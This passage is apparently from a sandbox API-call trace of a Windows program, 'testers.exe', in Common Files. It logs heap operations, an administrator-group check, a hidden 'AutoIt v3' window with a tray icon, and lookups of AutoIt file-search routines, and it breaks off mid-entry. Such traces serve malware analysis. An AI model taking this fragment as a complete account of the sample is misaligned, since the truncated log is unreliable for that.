0xc93d40 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93d58 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93d70 [0261.069] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93d88 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93da0 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93db8 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93dd0 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93de8 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93e00 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93e18 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93e30 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93e48 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93e60 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93e78 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93e90 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93ea8 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93ec0 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93ed8 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93f18 [0261.070] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93f30 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a6f0 | out: hHeap=0xc60000) returned 1 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a7b0 | out: hHeap=0xc60000) returned 1 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a798 | out: hHeap=0xc60000) returned 1 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a780 | out: hHeap=0xc60000) returned 1 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a810 | out: hHeap=0xc60000) returned 1 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a7c8 | out: hHeap=0xc60000) returned 1 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a7e0 | out: hHeap=0xc60000) returned 1 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a870 | out: hHeap=0xc60000) returned 1 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a828 | out: hHeap=0xc60000) returned 1 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a840 | out: hHeap=0xc60000) returned 1 [0261.070] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a8d0 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a8b8 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a888 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a918 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a900 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a8e8 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a930 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a948 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a9a8 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a960 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a978 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a9c0 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a9d8 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa38 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a9f0 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa08 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa50 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa68 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93558 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa80 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8aa98 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93570 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93588 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935d0 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935b8 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935a0 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935e8 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93600 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93660 | out: hHeap=0xc60000) returned 1 [0261.071] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93618 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93630 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93678 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93690 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936d8 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936c0 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936a8 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93738 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93720 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc936f0 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93780 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93768 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93750 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93798 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937b0 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937c8 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937e0 | out: hHeap=0xc60000) returned 1 [0261.072] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937e0 [0261.072] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc937c8 [0261.072] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93160 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937c8 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93160 | out: hHeap=0xc60000) returned 1 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937e0 | out: hHeap=0xc60000) returned 1 [0261.072] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937e0 [0261.072] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xc8a628 [0261.072] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc937c8 [0261.072] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86610 [0261.072] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93160 [0261.072] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a628 | out: hHeap=0xc60000) returned 1 [0261.072] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937b0 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93798 [0261.073] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937c8 | out: hHeap=0xc60000) returned 1 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937c8 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc86688 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93750 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93768 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93780 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc936f0 [0261.073] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937e0 | out: hHeap=0xc60000) returned 1 [0261.073] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93798 | out: hHeap=0xc60000) returned 1 [0261.073] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937b0 | out: hHeap=0xc60000) returned 1 [0261.073] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937c8 | out: hHeap=0xc60000) returned 1 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x6) returned 0xc93170 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc937c8 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93180 [0261.073] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937c8 | out: hHeap=0xc60000) returned 1 [0261.073] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0261.073] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93170 | out: hHeap=0xc60000) returned 1 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937c8 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937b0 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93798 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc937e0 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93170 [0261.073] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc937b0 | out: hHeap=0xc60000) returned 1 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc937b0 [0261.073] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93720 [0261.073] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93798 | out: hHeap=0xc60000) returned 1 [0261.074] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93798 [0261.074] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93180 [0261.074] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93738 [0261.074] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc936a8 [0261.074] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93190 [0261.074] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0261.074] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc936c0 [0261.074] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc936d8 [0261.074] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93738 | out: hHeap=0xc60000) returned 1 [0261.074] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xa) returned 0xc93738 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93690 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93180 [0261.075] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93690 | out: hHeap=0xc60000) returned 1 [0261.075] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0261.075] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93738 | out: hHeap=0xc60000) returned 1 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93738 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xc93690 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93678 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93180 [0261.075] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93678 | out: hHeap=0xc60000) returned 1 [0261.075] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0261.075] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93690 | out: hHeap=0xc60000) returned 1 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93690 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x12) returned 0xc8a628 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xc866b0 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc93180 [0261.075] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc866b0 | out: hHeap=0xc60000) returned 1 [0261.075] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0261.075] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc8a628 | out: hHeap=0xc60000) returned 1 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93678 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93630 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93618 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93660 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93600 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935e8 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x2) returned 0xc93180 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc935a0 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc935b8 [0261.075] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xc931a0 [0261.076] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93180 | out: hHeap=0xc60000) returned 1 [0261.076] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935d0 [0261.076] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93588 [0261.076] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc935a0 | out: hHeap=0xc60000) returned 1 [0261.076] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc935a0 [0261.076] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93570 [0261.076] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x3c) returned 0xc722d0 [0261.076] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93558 [0261.077] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93f48 [0261.077] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xc93f60 [0261.077] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93f78 [0261.077] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xc93f90 [0261.091] IUnknown:Release (This=0xc86520) returned 0x0 [0261.091] FreeLibrary (hLibModule=0x290000) returned 1 [0261.091] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79250 | out: hHeap=0xc60000) returned 1 [0261.091] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd79238 | out: hHeap=0xc60000) returned 1 [0261.091] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc93940 | out: hHeap=0xc60000) returned 1 [0261.091] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x91fdf0, lpFilePart=0x93fe10 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x93fe10*="testers.exe") returned 0x2f [0261.092] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0xc854c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x91fddc | out: IsMember=0x91fddc) returned 1 [0261.092] GetSysColorBrush (nIndex=15) returned 0x1100059 [0261.092] LoadCursorW (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0261.093] LoadIconW (hInstance=0x290000, lpIconName=0x63) returned 0x21013b [0261.093] LoadIconW (hInstance=0x290000, lpIconName=0xa4) returned 0x1c00c3 [0261.094] LoadIconW (hInstance=0x290000, lpIconName=0xa2) returned 0x1100ad [0261.094] LoadImageW (hInst=0x290000, name=0x63, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x100107 [0261.095] RegisterClassExW (param_1=0x91fdac) returned 0xc121 [0261.095] GetSysColorBrush (nIndex=15) returned 0x1100059 [0261.095] RegisterClassExW (param_1=0x91fd50) returned 0xc123 [0261.095] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0261.095] InitCommonControlsEx (picce=0x91fd80) returned 1 [0261.096] ImageList_Create (cx=16, cy=16, flags=0x21, cInitial=1, cGrow=1) returned 0xc9cbd0 [0261.097] LoadIconW (hInstance=0x290000, lpIconName=0xa9) returned 0x180163 [0261.097] ImageList_ReplaceIcon (himl=0xc9cbd0, i=-1, hicon=0x180163) returned 0 [0261.098] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0x50172 [0261.099] NtdllDefWindowProc_W () returned 0x0 [0261.099] NtdllDefWindowProc_W () returned 0x1 [0261.102] NtdllDefWindowProc_W () returned 0x0 [0261.105] SetTimer (hWnd=0x50172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0261.106] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0261.106] CreatePopupMenu () returned 0x70179 [0261.106] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x50172, hMenu=0x1, hInstance=0x290000, lpParam=0x0) returned 0x70174 [0261.120] NtdllDefWindowProc_W () returned 0x0 [0261.120] ShowWindow (hWnd=0x50172, nCmdShow=0) returned 0 [0261.120] ShowWindow (hWnd=0x50172, nCmdShow=0) returned 0 [0261.120] Shell_NotifyIconW (dwMessage=0x0, lpData=0x91fa28) returned 1 [0261.151] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xc9d660 [0261.151] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.152] Shell_NotifyIconW (dwMessage=0x1, lpData=0x91f658) returned 1 [0261.152] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xc9d660 | out: hHeap=0xc60000) returned 1 [0261.152] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.152] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.152] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.152] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.152] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xd69c70 [0261.152] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0261.152] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd69c70 | out: hHeap=0xc60000) returned 1 [0261.152] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.152] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.152] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.152] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0261.152] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0261.152] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0261.152] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.152] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.153] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.153] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0261.153] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0261.153] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0261.153] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.153] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.153] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.153] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0261.153] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0261.153] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0261.153] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.153] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.153] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.153] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0261.153] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0261.153] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0261.153] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.153] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.153] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.153] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0261.153] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0261.153] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd7ee10 | out: hHeap=0xc60000) returned 1 [0261.153] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xd75cf0 | out: hHeap=0xc60000) returned 1 [0261.153] PeekMessageW (in: lpMsg=0x91fd04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91fd04) returned 0 [0261.153] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xd75cf0 [0261.153] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xd7ee10 [0261.153] CharUpperBuffW (in: 